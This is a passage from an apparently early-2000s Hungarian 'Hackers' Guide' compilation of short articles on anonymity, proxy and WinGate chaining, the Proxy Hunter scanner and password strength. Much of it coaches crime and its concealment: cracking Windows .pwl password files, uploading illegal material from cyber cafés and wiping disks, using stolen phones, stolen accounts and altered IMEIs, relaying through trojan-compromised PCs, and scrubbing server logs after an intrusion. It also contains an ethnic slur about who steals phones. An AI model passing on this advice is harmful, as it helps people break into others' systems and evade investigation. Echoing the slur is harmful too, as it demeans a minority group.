(a'la sulinet) ezt... Például a nestan@freemail.hu@sulineve.sulinet.hu e-mail címre<br />

küldött levelet (ha a mailserver rosszul van beállítva) elküldi nekem... és így a<br />

headerben a suli infói lesznek :)<br />

166


Hackers’ Guide<br />

.chk fájlok, mi van velük?<br />

Szóval talán már biztos, hogy találkoztál .chk kiterjesztésű fájlokkal... Tudod, amiket<br />

a Windows gyárt nagyiparban a lefagyások után ;) Szóval ezekről beszélek... Hogy<br />

mi közül van ezeknek a névtelenséghez? Nézd csak meg a fájlok tartalmát... Úgye<br />

milyen meglepő, hogy mennyi információt tárolnak rólad??? Ajánlatos tehát minden<br />

alkalommal a C:\ gyökérből törölni az összes .chk fájlt!<br />

.pwl fálok?<br />

Igen... Ilyenek is vannak... és hogy a pwl kiterjesztés valójában mit takar? Az összes<br />

windows azonosítót/jelszót... Nézd csak meg... Ott van a C:\Windows könyvtárban...<br />

Érdemes megnézni közelebbről is őket... A fájl neve általában a felhasznalonev.pwl<br />

felállásban található meg... Nem kell ezekután semmit sem tenned, csak letölteni egy<br />

PWL fájl törő programot (pl. a Cain 1.51, de találsz más progikat is a<br />

http://ww.password-crackers.com URL alatt) és ráereszteni mondjuk Brute Force a<br />

kódtöröt... Milyen jó, amikor más dolgai között kutatgatunk :)<br />

Hogyan helyezzünk fel nem kívánatos dolgokat az internetre úgy, hogy<br />

identünk ne derüljön ki?<br />

Ehhez néhány perverz ötlet jutott az eszembe... Az egyik a cyberkávézók... Ugyebár<br />

itt a forgalom rettenetes és nem hiszem, hogy egy hét múlva emlékezni fognak az<br />

arcodra... és ugyanez mehet a könyvtárakban is... A Sulinetes termeknél vigyáznék...<br />

mert ilyenek miatt nagy csetepatét tudnak ám rendezni... A másik, hogy ahol hackelt<br />

oldalakat vagy illegális dolgokat fogsz feltölteni, oda ne járj vissza! Ez fontos! Miután<br />

feltöltötted a dolgokat fdiskel kedvesen töröld a partíciókat :) Ennél gyorsabb<br />

módszer nincsen a tisztogatásra... Aztán még egy ilyen bizarr ötlet az, hogy lopatunk<br />

a "színes kisebbséggel" frissen mobilt... megugye egy laptopot... összekötjük a kettőt<br />

aztán valami lopott accountal irány a net... :)<br />

Néhány link a végére...<br />

http://www.theargon.com<br />

http://www.pgpi.com<br />

http://www.cyberarmy.com<br />

http://2waymedia.hypermart.net/hh/browsers/index.htm<br />

http://www.anonymizer.com<br />

http://www.hacker.co.il<br />

http://www.hacker.co.za<br />

http://neworder.box.sk<br />

Összegzés meg miminden<br />

Szóval ha voltam olyan állat, hogy ennyit írjak, akkor úgy illik, hogy valamivel zárjam<br />

soraimat... Appendixnek a végére csak annyit, hogy hülyeség manapság egy olyan<br />

167


Hackers’ Guide<br />

helyen névtelenségről beszélni, ahol még azt is .logolják szinte, hogy mikor szarsz ;)<br />

... de egyvalamire jó ez az egész... Megmutatja számodra, hogy csak megfelelő<br />

odafigyeléssel tudsz felismerhetetlen maradni és a hackerkedés sem abból áll, hogy<br />

egy password fájlra ráereszted a John The Rippert vagy a L0pthCracket... Ennyi...<br />

Vége... Még utoljára elmondom... ha valakinek valami nem volt világos, akkor kérem<br />

írjon, mert múltkor is egy csomóan rinyáztak a mobilos cikk miatt... Csak azt nem<br />

tudom, hogy mit nem lehet rajta érteni?! Na mind1... Szóval ha próbléma van, akkor<br />

mélázzatok NEKEM!!!<br />

Nestan [FCF] mailto: nestan@freemail.hu<br />

·<br />

Külön köszönet a segítségért az alábbiaknak: RSC, Formater<br />

************************************************************************************************<br />

Hogyan maradjunk ismeretlenek?<br />

A hack-elés első és legfontosabb követelménye: NE BUKJ LE! Éppezért nagyon<br />

vigyázz és csak olyan dologba menj bele, amit TELJESEN biztonságosnak érzel!<br />

Ismerd a képpességeidet és mindíg csak annak megfelelően cselekedj! Mindennél<br />

jobban figyelj oda arra, hogy a ténykedésed ne legyen benne a log-ban/el legyen<br />

bujtatva az IP-címed. Ebben a kis tutorialban ezt a témát fejtem ki bővebben. Szóval<br />

kezdjük is azzal, hogy mi is az a socks/proxy/wingate/spoof-firewall. Ezek olyan<br />

server-ek, amik kapcsolódáskor a géped és a kapcsolódni kívánt gép közé<br />

ékelődnek és ezeken keresztül továbbítódnak az adatok úgy hogy a firewall kiszűri<br />

belőle a rosszindulatú csomagokat (a "házi" firewall program is képes erre<br />

softwaresen, de sokkal hatástalanabbul felügyeli az adatkommunikációt, bár a<br />

firewall servereken is ilyen fut komolyabb kivitelben), így azokra már nem kell<br />

ügyelned. A másik fontos tulajdonsága hogy a másik géphez kapcsolódva nem a te<br />

IP-d lesz látható hanem a firewall-é és ez a leglényegesebb, mert az Internet<br />

szolgáltatód egyből kiadja az adott időben használt IP-dből a telefonszámod/címed<br />

és már jönnek is a fakabátok (ezért kell valami telefonszám visszakereshetetlenítő<br />

cuccot(anti- tracert) használni. Bár ez már "kicsit" bonyolultabb dolog :), akik<br />

elkobozzák a géped és a csupa legális szoftvereid, a pornócédétől kezdve a hacker<br />

cuccos CD-n át egészen a felírt winfos2000-ig és még ezekért is jókora büntetést<br />

kapsz.<br />

168


Hackers’ Guide<br />

Legfontosabb különbség lehet firewall és firewall között hogy lehet anonymus vagy<br />

publikus. Ez annyit jelent, hogy a publikus nem használható hack-elésre, mert ha<br />

megmondják nekik hogy rajtuk keresztül törés történt, akkor secpec alatt megmonják<br />

az igazi IP-t. Az ilyen publikus firewall-okat általában cache-elés céljából hozzák<br />

létre. Az Internetes cache működése: amikor egy cache serverhez kapcsolódva<br />

akarsz adatot letölteni, a server először saját merevlemezén (vagy vele hálózatba<br />

kötött más cache serverek merevlemezén) próbálja megtalálni a kívánt adatot, ha ott<br />

megtalálja, akkor közvetlenül a cache-serverről nagyobb sebességgel letöltheted. Ha<br />

nincs meg, akkor letölti arról a helyről amit megadtál és elmenti a vinyójára, így<br />

legközelebb már benne lesz a cache-be (de egy idő után törlődik). Hátránya ebből<br />

következőleg hogy nem biztos hogy a legfrissebb infót kapod meg. A cacheserverekben<br />

akár a kért információk 30%-a is megtalálható.<br />

Az anonymus firewallok már megfelelő védelmet nyújtanak, de komolyabb tettek<br />

esetén azok sem védhetnek meg. Pl.: ha valami nagy dolgot hajtottál végre akkor<br />

onnan is megszerzik az IP-d. Ezért lehet komoly betöréseknél hasznos több firewall<br />

egymás mögé bújtatása, összefűzése. Ezt egyszerűen megteheted: miután<br />

csatlakoztál a firewall serverhez, újból csatlakozol egy másikhoz. Ennek többszöri<br />

végrehajtásával ellehetetlenítheted a visszakeresést. A legtöbb tűzfalat csak egy<br />

szűk kör hasznáhatja (Jelszóval szokták levédeni/vagy kitiltanak belőle IP-ket. Az<br />

olyanok amiket a nagyközönség is használhat általában tiszavirág életűek ezért a<br />

firewall listák naponta változnak.). Sajnos a hírhedtebb tűzfalak IP-jét sok server<br />

egyszer és mindenkorra kitilja magából elővigyázatosságból... Többféle firewall<br />

server létezik:<br />

1. Socks: IRC-s tűzfalnak szokták használni. Két típusa van: a socks4-es és a<br />

socks5-ös. Általában a 1080-as porton mennek. Hátrányuk lehet egyes ismeretek<br />

hiánya (OP :)) és (mint a legtöbb tűzfalnak) a lassúság. Természetesen csak arra jó<br />

hogy ne szívassanak IRC-ről. Ha nem tudsz jó socks-firewall-t akkor itt egy oldal,<br />

ahonnan egy kis klienset letöltve IRC-zhetsz anonymus: www.missingu.com<br />

2. Proxy: általában HTTP/FTP-hez szokták használni (ezek között vannak a<br />

cacheserverek). A 8080/3128-as portokon szoktak kapcsolódni.<br />

3. WinGate: ezt tulajdonképpen minden szolgáltatáshoz lehet használni<br />

(FTP/HTTP/TELNET/IRC/stb...). Default portjuk a telnet port (23), de egyre<br />

gyakoribbak a 1080-as porton üzemelők is.<br />

4. Spoof: a lényege hogy valaki más nevében (IP-címében) cselekszel. Ez már a<br />

haladóbb technikák közé tartozik. Abból áll, hogy pl egy trojan segítségével az<br />

uralmad alá kerítesz egy PC-t és azt használod firewallként, annak az IP-címét<br />

használod törésnél. Ez már kicsit brutális technika... :)) Spoof-olás után mindíg<br />

takarítsd el a nyomokat (trojan, stb.) Elvileg mindegyik firewall összefűzhető telnet<br />

segítségével. Ha bármi törvénybe ütközőt teszel a neten akkor jobb ha elbújtatod az<br />

IP-d. Ja, és SEHOL ne hagyj olyan nyomot amin keresztül eljuthatnak hozzád. Pl.:<br />

SOHA ne adj meg valódi nevet egy software-edben sem, ne regisztrálj sehol valós<br />

névvel, címmel, adattal. Mert baromi egyszerűen (akár egy JavaScript-el<br />

megtuthatnak mindent rólad... Itt egy jó cím kiindulásnak még az anonymizáláshoz:<br />

www.webprovider.com Ha már feltörted a célpontod, akkor már nem is nagyon van<br />

szükséged IP-bújtatásra (de ki tudja a kezdeteknél, hogy sikerrel jár-e?!... :)),<br />

169


Hackers’ Guide<br />

egyszerűen eltünteted a logfile- okból (figyelj hogy az összesből!) a bűvészkedéseid<br />

nyomát (de ezesetben később értesítsd a rencergazdit a bejutásod módjáról (ez így<br />

lojális), miután végrehajtottad a server-en azt amit terveztél) vagy szedd ki/írd át :))<br />

belőle az IP-t! Itt jegyezném meg hogy nagyon vigyázz a backdoor-okkal mer nem<br />

olyan nehéz őket megtalálni és sokan buktak már le backdoor használat közben!<br />

Vigyázz az e-mail-el mert manapság az is veszélyes (webes felületről<br />

levelezz+titkosíccs ha nagy dologra készülsz)! Egyébként a lakásodban ne tarts<br />

semmi olyat nagy akciók után ami perdöntő lehet (értem ezalatt a dokumentumokat<br />

és a programokat a vinyón és a lemezeken)! Itt egy útvonal, amin ábrázolva van,<br />

hogy hogyan juthatnak el hozzád (alatta pedig hogy hogyan szakíthatod meg a<br />

láncszemet) IP-d -> Internet hozzáférésed -> telefonszámod -> lakcímed Firewall/<br />

Lopott/hamis néven Használj valami Hack-elj $uliból Log-koz- regisztrált elérés<br />

anti-tracert/ (ez kész lebukás :) metikázás (vigyázz mert így átírt IMEI-jű<br />

Internet kávézóból is vissza tudják mobiltelefont! Ellenségedtől...<br />

nyomozni a számod!) * vagy mitomén :))) (*: de háromszögeléssel ezt is<br />

meg lehet találni de persze csak real time-ban és az esélye szinte 0) A legjobb ha<br />

mind az összes láncszemet kiiktatod ;) de persze erre (szinte) soha nincs szükség.<br />

De ha már a NASA-t töröd :) itt egy kis védelmi rencer: összefűzött anonymus<br />

wingate-ek egy spoof-olt netezőn keresztül vannak "bekötve", miközben lopott<br />

eléréssel egy átírt IMEI-jű mobilon anti-tracert használva ülsz egy mozgó kocsiban a<br />

laptop-oddal... Így talán nincs szükség a log-bűvészkedésre... :)))))) Nah, mára ennyi<br />

volna, de lehet hogy később folytatom... A dokumentumot csak az engedélyemmel<br />

publikálhatjátok máshol! ASCIImo<br />

************************************************************************************************<br />

Egyedi azonosító?<br />

Alig volt idô arra, hogy megjelenjenek a felháborodott újságírók cikkei az új Intel<br />

processzorokba égetett egyedi azonosítószámok kapcsán, máris felfedezésre került<br />

a Microsoft által programhibának keresztelt másik egyedi azonosító is, amely a<br />

Win98-as DOC fileokba épül be. Figyelnek minket a neten, tudják mikor és hol járunk<br />

- ha kellôképpen régi a konfigurációnk ahhoz, hogy a hatalmas Microsoft még ne<br />

tudja minden lépésünket követni, akkor is ott az IP címünk, amely alapján bármikor<br />

visszakereshetik tetteinket.<br />

Annak idején az iskolában úgy tanultuk, hogy az IP cím egy egyedi azonosító, mely<br />

alapján egyértelműen kideríthetô, hogy ki az adott felhasználó, s ez így is van, ám ha<br />

az ember kellôképpen megszelidíti, az IP-nek is könnyen nyoma veszhet a<br />

rengetegben.<br />

Böngészés közben akarva akaratlanul is kénytelenek vagyunk az adott weboldalnak<br />

IP címünket megadni - hiszen enélkül lehetetlen lenne a kommunikáció -, ám ha rá<br />

17 0


Hackers’ Guide<br />

tudunk bírni valakit, hogy álljon a közénk és a kiszolgáló közé, rejtve maradhat az<br />

adott oldal számára a mi címünk. Köztes félnek alkalmas pl. a<br />

http://www.anonymizer.com/ oldal.<br />

Anonymous E-MAIL serverek százával találhatóak a hálózaton - segítségükkel IP<br />

címet nem tartalmazó leveleket tudunk küldeni (s ha szerencsénk van, akkor az E-<br />

MAIL küldô server sem loggol), habár sok helyen megkötés van a napi<br />

levélforgalmunkat illetôen.<br />

Talán a legfontosabbnak IRC-zés közben tűnik az eredeti IP-nk elrejtése, hiszen a<br />

legtöbb negatív élményt itt szerezheti az ember, pl. ha belekerül egy netharc<br />

közepébe (vagy netán szembetalálkozik az ôrült netes gyilkossal, aki IRC-n gyűjti<br />

leendô áldozatait). A legegyszerübb módja az anonimitásnak, ha ellátogatunk a<br />

http://www.missingU.com címre, ahol egy JAVA-s IRC programmal csatlakozhatunk<br />

az IRCNetre, @missingU.com host-al. Ennél kellemesebb megoldás, ha egy<br />

nyilvános proxy-t használunk, hiszen így a megszokott IRC kliensünkel<br />

csatlakozhatunk a hálóhoz, csak a hostunk lesz a megszokottól eltérô. Szabadon<br />

elérhetô proxy serverek magyarországon is vannak - itt közölni ôket azonban<br />

értelmetlen lenne, hiszen a túlterhelés miatt lassúak lennének, és az IRC serverek<br />

sem engednék be a felhasználókat az azonos (proxy-s) hostok miatt.<br />

Nem csak mi tudunk elbújni mások mögé, ha óvatlanok vagyunk, mások is pajzsnak<br />

használhatnak minket, ha a 1080-as portunk nyitva van. Eképpen lehetséges akár az<br />

is, hogy egy személy 10-20 különbözô szolgáltatónál lévô dialup-os hostal legyen<br />

fenn egyszerre IRC-n, ami megkérdôjelezheti az IP cím egyedi azonosító mivoltát.<br />

A végsô kérdés igazán kézenfekvô: megtanulhatunk anonimitásba burkolózni mások<br />

mögé bújva, s üzenetközvetítôket használva - könnyedén. De mi van akkor, ha ôk<br />

éppen azért vállalják ezt a szerepet, hogy lehallgassanak minket?<br />

Video<br />

************************************************************************************************<br />

Proxy I.<br />

1. Mi az a proxy szerver?<br />

2. Milyen egy proxy szerver?<br />

3. Hogy talaljunk egyet?<br />

4. Hogyan konfigurajuk a bongeszobe?<br />

1. Mi az a proxy szerver?<br />

A proxy szerverek segitsegevel konnyen es gyorsan elrejthetjuk az IP-ket.<br />

17 1


Hackers’ Guide<br />

2. Milyen egy proxy szerver?<br />

A proxy szerver egy tuzfal szerver. Ehhez a szerverhez mas szamitogepek<br />

csatlakoznak es ezeken keresztul interneteznek. Ha bongeszel akkor ez altalaban<br />

igy nez ki:<br />

Te geped -> ISP (szolgaltato) -> A web lap (Igy a sajat IP-det latjak)<br />

Ha proxy-t hasznalsz:<br />

Te geped -> ISP -> Proxy -> A web lap (Igy pedig a proxy IP-jet latjak)<br />

A proxy elrejti a sajat IP-det.<br />

3. Hogyan talaljunk egyet?<br />

Kersz, kapsz :). Kulfoldi es hazai lapokon is szoktak lenni proxy listak, ezek nagy<br />

resze nem mukodik, de azert van kozottuk hasznalhato is. Altalaban a szolgaltatonak<br />

is van proxy szervere. Na de ha mar nincs mit tenni akkor olyan hostot vagy IP-t<br />

keresel amelyiknek szabad a 8080 vagy a 3128-ik portja.<br />

4. Hogyan konfigurajuk a bongeszobe?<br />

Internet Explorerben: View (nezet) -> Network (Internet beallitasok) Proxy tab.<br />

Ne hasznalj Netscape-et :) De ott is valahol a Properties-ben vagz Options-ban van.<br />

Zucco<br />

************************************************************************************************<br />

Proxy II.<br />

A proxy szót olyan értelemben fogom használni, mint átjárót két számítógép között.<br />

Tegyük fel, hogy van két számítógép, amelyek kommunikálnak egymással, A és B.<br />

Példánkban A kapcsolatot létesít B-vel, és adatot cserélnek:<br />

A ========== B<br />

Mindketten látják egymás IP címeit, és egyenesen oda küldik az adatokat. Ez a fajta<br />

kommunikáció a leggyakoribb az Interneten. Elképzelheto azonban olyan eset,<br />

amikor A nem tudja (vagy nem akarja) egyenesen B-nek küldeni az adatokat, hanem<br />

egy harmadik felet kér meg a közvetítésre, vagyis C-t:<br />

A ======= C ======= B<br />

17 2


Hackers’ Guide<br />

Ekkor A is és B is közvetlenül C-vel kommunikál, azonban C-nek mindössze annyi a<br />

szerepe, hogy az A-tól jövo adatokat továbbítsa B felé, mintha o küldte volna oket, és<br />

fordítva. Ebben az esetben C-t tekinthetjük proxynak. A proxy azért érdekes<br />

számunkra, mert ha A kezdeményezi a kapcsolatot B felé, akkor B nem fogja tudni A<br />

valódi IP címét, hanem úgy fogja érzékelni a csatlakozást, mintha C kezdeményezte<br />

volna (azonban a valóságban mögötte áll A).<br />

Többféle típusú proxy létezik (protokoll szerint megkülönböztetve). A telnetes<br />

kapcsolatok használatához (pl. email/fakemail küldése, IRC, accountra való<br />

bejelentkezés stb) gyakran használatos, egyszerusége miatt a WinGate. Ez<br />

általában a 23-as porton szokott lenni, és onnan lehet felismerni, hogy ha telnettel<br />

kapcsolódunk hozzá, akkor "WinGate>" prompttal köszön. Lássunk egy példát!<br />

Tegyük fel, hogy az ftp.rulez.org címre akarunk csatlakozni a 6667-es porton (ez<br />

általában az IRC portja), de nem akarjuk, hogy lássák az IP címünket. Közbeiktatunk<br />

egy WinGate proxyt, amelynek a címe például az, hogy proxy.wingate.com. Indítsuk<br />

el a telnetet, és csatlakozzunk a proxy.wingate.com -hoz (vagyis a wingate-hez)!<br />

>>MS Windows 9xRun, írjuk be: telnet proxy.wingate.com<br />

A megjeleno "WinGate>" szöveg után írjuk be: ftp.rulez.org 6667 (és üssünk entert):<br />

WinGate> ftp.rulez.org 6667<br />

Connecting... Connected to host ftp.rulez.org on port 6667<br />

és készen is vagyunk, megkezdhetjük a telnet-kapcsolatot, ugyanúgy, mintha nem<br />

használnánk proxyt.<br />

Fejlettebb szolgáltatást nyújt a SOCKS, kétféle verzió terjedt el széles körben, a 4-es<br />

és az 5-ös. Ezt nehézkes telnettel használni (a Win9x beépített telnetjével nem is<br />

lehet), de a legelterjedtebb IRC-kliensek (mIRC, Pirch98 stb) támogatják a<br />

használatát. A mIRC-ben (5.6-os verzió van meg nekem) nyomjunk Alt-O -t, és a<br />

Connect menüpont alatti Firewall menüpontot válasszuk ki. Jelöljük be az "Use<br />

SOCKS firewall" négyzetet, és válasszuk ki, hogy milyen verziójú szervert<br />

használunk. A "Hostname" mezobe írjuk a SOCKS proxy IP-címét vagy hostnevét,<br />

alá a loginnevet és a jelszót (ha kell), majd a portot (általában a SOCKS az 1080-as<br />

porton üzemel). "Initiate DCCs through firewall" - kapcsoljuk be, majd nyomjunk OK-t.<br />

Ezentúl minden alkalommal, amikor ircelni akarunk, a mIRC megpróbálja majd a<br />

csatlakozást a SOCKS-on keresztül létrehozni. Ha nem sikerül, hibaüzenetet kapunk<br />

(ekkor esetleg másik SOCKS-ra kell váltanunk).<br />

Pirch98-ban pedig az IRC menübol válasszuk a "Proxy setup" menüpontot, majd a<br />

megjeleno ablakba írjuk be a szükséges információkat (a Pirch csak a 4-es proxyt<br />

támogatja). Nyomjunk OK-t, és a továbbiakban csatlakozáskor a SOCKS-on<br />

keresztül kapcsolódunk.<br />

Proxyk kereséséhez Win9x alatt a Proxy Hunter nevezetu programot ajánlom, mert<br />

gyors, sokféle proxyt ismer, és sok szolgáltatása van. Errol a címrol lehet letölteni a<br />

legújabb verziót:http://member.netease.com/~windzh/indexe.htm<br />

17 3


Hackers’ Guide<br />

************************************************************************************************<br />

Proxy Hunter leírás<br />

Proxykat akarunk keresni, igaz? Ehhez definiálnunk kell a Proxy Hunternek<br />

feladatokat. A program ablakában három lap van (Tasks, Results, ProxySwitch).<br />

Kattintsunk a Tasks-ra (ha nem az aktív), majd az ablak alján az Add task gombra. Itt<br />

természetesen minden le van írva, mint ahogyan a programban mindenütt, csak hát<br />

ki olvassa végig ezeket, foleg, ha nem tud angolul, igaz?<br />

Állítsuk be a Task type-nél a Searching task -ot, és nyomjunk Next-et.<br />

Kattintsunk a Defined ranges -re. Elougrik egy ablak, ahol beállíthatjuk, hogy milyen<br />

IP-cím tartományokban keressen majd a program. Újakat adhatunk hozzá az Add<br />

gombbal, illetve a többi gomb is meglehetosen egyértelmu.<br />

Ha az Add -ra kattintunk, a legegyszerubb, ha fölül Start&End range -t állítunk,<br />

beírjuk az induló címet, a végcímet, az Annotationhoz valami megjegyzést írunk (pl.<br />

"Amerikai wingatek") és OK-t nyomunk. A muveletet többször is megismételhetjük.<br />

Ha végeztünk, jelöljük ki az egész listát, amit hozzáadtunk, és mentsük el egy fájlba<br />

a Save gombbal. Utána kattintsunk az Use-ra. Az elozo ablakba jutunk vissza, ahol<br />

láthatjuk hogy a kijelölt tartományokat a program felvette. Kattintsunk a Next -re.<br />

Itt fogjuk beállítani, hogy melyik portra fogunk keresni. A Defined -ben hasonló<br />

ablakot kapunk, mint az elozo. Itt is az Add gombbal tudunk hozzáadni portokat a<br />

feladathoz.<br />

Beállíthatunk port-tartományokat is, ekkor a tartományban levo összes portot végig<br />

fogja nézni minden számítógépnél, hogy nyitva van-e. Ha csak egy bizonyos portra<br />

akarunk keresni, akkor állítsuk be a Port range -t, és írjuk be a portot, ha pedig<br />

tartományra, akkor Single port -ot (tehát ez egy little bug a programban). Miután<br />

meghatároztuk a port számát, adjuk meg, hogy az adott porton milyen szolgáltatást<br />

keresünk (HTTP, SOCKS, FTP, Telnet(WinGate) és Unknown). Ha pl. FTP-t állítunk<br />

be, akkor a proxy hunter, miután talált egy nyitott portot, le fogja ellenorizni, hogy a<br />

talált porton ftp-szolgáltatás van-e. Ha Unknown -t állítunk be, akkor nem nézi meg,<br />

hogy mi van a nyitott porton, hanem automatikusan beírja találatnak.<br />

Kattintsunk az OK-ra. A muveletet csakúgy, mint az elobb, többször is meg lehet<br />

ismételni. Utána jelöljük ki a listát, és kattintsunk a Use -ra. A program fel fog tenni<br />

egy kérdést "Must try?", ami egy kis magyarázatra szorul.<br />

Az Use gomb hatására a kijelölt portokat hozzáadja a feladathoz. Ha az egész listát<br />

jelöljük ki, akkor az összeset. De tegyük fel, hogy a beállított IP-tartományban mi<br />

Wingate-ket és SOCKS-okat akarunk keresni. Ha beállítjuk egy adott portra a "Must<br />

try" opciót, akkor a Proxy Hunter minden számítógépnél meg fogja nézni, hogy nyitva<br />

van-e. Ha talál legalább egy "Must try" portot, csakis akkor nézi meg a nem "Must try"<br />

portokat. Ez azért kell, mert nagyon gyakori, hogy pl. a Wingate-k és a SOCKS-ok<br />

együtt fordulnak elo (tehát ugyanaz az IP Wingate és SOCKS is egyben). Ekkor elég,<br />

ha csak az egyikre állítunk be "Must try"-t, és ez nagyon felgyorsítja a keresést, hogy<br />

17 4


Hackers’ Guide<br />

a másikat nem kell mindenhol megnéznie (természetesen ezzel esetleg párat nem<br />

fog megtalálni).<br />

Nem maradt más dolgunk, mint hogy a "Finish"-re nyomjunk és ezzel felvettünk egy<br />

feladatot. Ezt el is menthetjük, a Tasks menübol az Export-tal.<br />

Több feladatot is felvehetünk, és a Proxy Hunter ezeken végig fog sorban menni.<br />

Ha befejeztük, kattintsunk az eszközsorban a kék háromszögre, úgy néz ki, mint egy<br />

Play gomb a videón. Váltsunk át a Results lapra, itt fogjuk látni a találatokat (ha lesz<br />

egyáltalán). Azok a találatok a nyerok, ahol GOOD! van a Status oszlopban<br />

(némelyik Verification timeout-os is jó lehet).<br />

Nagyjából ennyi. A programnak van még számos extra funkciója, de ennyi elég lehet<br />

a használatához.<br />

Itt van egy fájl, amit a Tasks>Import segítségével lehet beimportálni a programba. Ha<br />

végigfuttatjuk, végigkeres egy csomó magyar modemes IP-tartományt SOCKS után<br />

kutatva. A találatokat utána fel tudjuk használni például irceléshez. [Hungary.tsk, 708<br />

byte]<br />

Ez pedig egy másik file, ami csak egy IP-tartomány, ha netán mást portot szeretnénk<br />

keresni. Ehhez új feladatot kell definiálnunk, majd importáljuk a fájlt, utána pedig a<br />

fent leírt módon állítsuk be a kívánt portot. [HungaryDialup.ipr, 398 byte]<br />

Ja igen. A keresés közben használjunk jól bekonfigurált tuzfalat, mert sokan<br />

támadásnak hiszik, ha valaki csatlakozni akar valamelyik portjukra, és vissza fognak<br />

loni. Ez azt eredményezheti, hogy lekapcsol a modemünk, vagy megfagy a gépünk.<br />

************************************************************************************************<br />

A jelszavakról általában<br />

Password<br />

A jelszó amit a virtuális világban használunk, talán a reális világunk átjárója. A mai<br />

világban körül vagyunk véve jelszavakkal, még ha nem is egészen így hívjuk őket.<br />

Ott van a bankszámlánk, a mobiltelefonunk PIN kódja... stb. És vannak emberek akik<br />

ezt meg akarják szerezni, és ha nem vigyázunk, és óvatlanok vagyunk ez sikerül is<br />

nekik. Itt találsz majd egy pár információt, hogy hogyan is csínálják, és, hogy hogyan<br />

is védekezhetünk ellenük sikeresen.<br />

17 5


Hackers’ Guide<br />

Sokszor a védelmi rendszer hagy némi kívánnivalót magaután. Erre jó példa az<br />

eredeti windows 95-ben található jelszótárolási mechanizmus. (Ez a baki az OSR2ben<br />

javítva lett.) De ha a tárolási rendszer jó akkor csak egy féle módszerrel lehet a<br />

jelszót megtörni: az összes variációt kipróbálni. Ilyenkor fontos tudni, hogy mennyi a<br />

lehetséges összes előforduló jelszó és a keresési sebesség.<br />

A lenti táblázat a jelszókeresési időt ábrázolja a jelszó hosszának és a karakterek<br />

függvényében.<br />

A keresési sebesség 100.000 jelszó/sec. (Elég tisztes sebesség!)<br />

A jelszó<br />

hossza /<br />

Betűkészlet<br />

Azonos betű<br />

nagyság,<br />

csak betű.<br />

(26)<br />

Egyféle betű<br />

nagyság,<br />

betűk +<br />

számok. (36)<br />

Különböző<br />

betű nagyság.<br />

(52)<br />

Minden<br />

nyomtatható<br />

karakter. (96)<br />

4 0 0 1 perc 13 perc<br />

5 0 10 perc 1 óra 22 óra<br />

6 50 perc 6 óra 2.2 nap 3 hónap<br />

7 22 óra 9 nap 4 hónap 23 év<br />

8 24 nap 10.5 hónap 17 év 2287 év<br />

9 21 hónap 32.6 év 881 év 219,000 év<br />

10 45 év 1159 év 45,838 év 21 millió év<br />

A felhasználó választ egy jelszót, és a hacker megpróbálja azt feltörni. A felhasználó<br />

megpróbál olyan jelszót választani - és olykor sikerül is -, amit szerinte nehéz<br />

kitalálni, a hacker pedig az idővel van örök harcban. Mert ugye a táblázatból kitűnt,<br />

hogy egy sima 6 karakteres csak betü és állandó betűnagysággal írt jelszót (PL:<br />

jelszo) fel lehet törni ~1 óra alatt. De ha már 1(!) karakterrel többet írok hozzá és az<br />

az egy karakter szám, és esetleg van benne változó betűméret (PL: jELsZo7) akkor<br />

az idő megugrik ~2 napra. De ha egy 8 karakter hosszú jelszót kicsit megbolondítok<br />

(PL: I$am@Ok!) akkor ennek feltöréséhez 2287 év lesz. Ez egy örök harc<br />

volt/van/lesz. Persze itt most nem szólok a "gagyi" jelszavakról, mint például a<br />

felhasználói névvel megegyezők, vagy a kutya neve vagy ilyen marhaságok... És az<br />

intelligens feltörő módszerekről sem , ahol már a mesterséges intelligencia elemzi a<br />

felhasználó viselkedését, gondolkodásmódját, és abból próbálja összerakni, hogy<br />

mégis milyen szisztéma szerint választotta ki az adott felhasználó a jelszót. Pedig a<br />

jövő ezé lesz!)<br />

Milyen jelszavakat is szeretnek a hackerek? Azon kívűl, hogy a megfejtetteket... =D<br />

Bizony ha az emberek maguknak generálnak jelszót akkor sokan beleesnek a<br />

"kutyámneve" csapdába. Gyakran az emberek olyan jelszót találhak ki amire egy kis<br />

háttérnyomozás után rá lehet jönni. Például, foglalkozás, az említett<br />

kutyám/macskám/lovam/barátnőm/barátom neve, utca neve ahol lakik, személyi<br />

szám vagy más igazolvány szám, neki vagy családtagja születési éve kombinálva,<br />

stb... Vagy ha nem is ilyen egyszerűket akkor közismert jelszavakat. Ezeket a<br />

gyakrabban használt jelszavakat a hackerek tudják és ezekkel próbálkoznak először.<br />

Ha esetleg érdekel egy ilyen szólista itt: ftp://ftp.cso.uiuc.edu/pub/security/wordlists/<br />

elvileg találhatsz egy csomót.<br />

Ha, beszélsz idegen nyelveket (elég egy kicsit) akkor ezeket a szavakat<br />

használhatod jelszóként. A hackerek legtöbbször angol nyelvű szótár-fájlokat<br />

17 6


Hackers’ Guide<br />

használnak, mivel az internet nyelve az angol. Ha mondjuk a jelszóban szerepel<br />

például egy német, vagy indiai, szó az külön poén, hátha még számokkal<br />

helyettesítesz néhány karaktert... sőt ha visszafelé írod... =)<br />

A talán legjobb megoldás a számítógép generálta véletlenszerű jelszó. Sajnos ez<br />

sokszor nem megfelelő mert így eléggé megjegyezhetetlen jelszavak jönnek ki (PL:<br />

zmg74u5p) De ha nem megjegyezhető akkor bizony előbb utóbb le lesz írva. Vagy a<br />

jegyzetfüzetbe, vagy a számítógépen egy file-ba. Ezek pedig a legrosszabb<br />

megoldások. A jegyzetfüzetet el lehet hagyni, a számítógépet pedig fel lehet törni.<br />

(Persze ha mondjuk egy txt file-ban pgp-vel lekódoljuk,és betömörítjuk jelszavazva<br />

rarral akkor az kicsit biztonságosabb. Azért ne zippel mert az sec perc alatt<br />

feltörhető!!!) Egyszer majd csak születnek olyan programok amik majd humánus de<br />

nehezen megfejthető jelszavakat generálnak... =)<br />

Ha már saját magunk akarunk könnyen megjegyezhető jeszót készíteni akkor<br />

érdemes két értelmes szó közé beszúrni egy karaktert mondjuk a $ jelet. Ez<br />

megnehezíti a hacker dolgát mert ő nem tudja, hogy az alma$körte jelszóban van 2<br />

értelmes szó csak valamilyen karakterrel van elválasztva, és úgy unblock nézi az<br />

egészet. Meg lehet nézni hogy egyébként is egy 10 karakteres jelszónál azonos<br />

betűmagassággal is több év (~40) a megfejtési idő.<br />

Írok egy kicsit a (case sensitive) változó betűnagyságú jelszavakról is... =) Ez röviden<br />

azt takarja, hogy a jelszót nem csupa kis, vagy NAGY betűvel írjuk hanem<br />

öSszEViSsZa. a neten ez a legkedveltebb módszer a jelszavak kitalálása<br />

szempontm jából. Két ok miatt is. 1. Egyszerű őket megjegyezni. Ha egy értelmes<br />

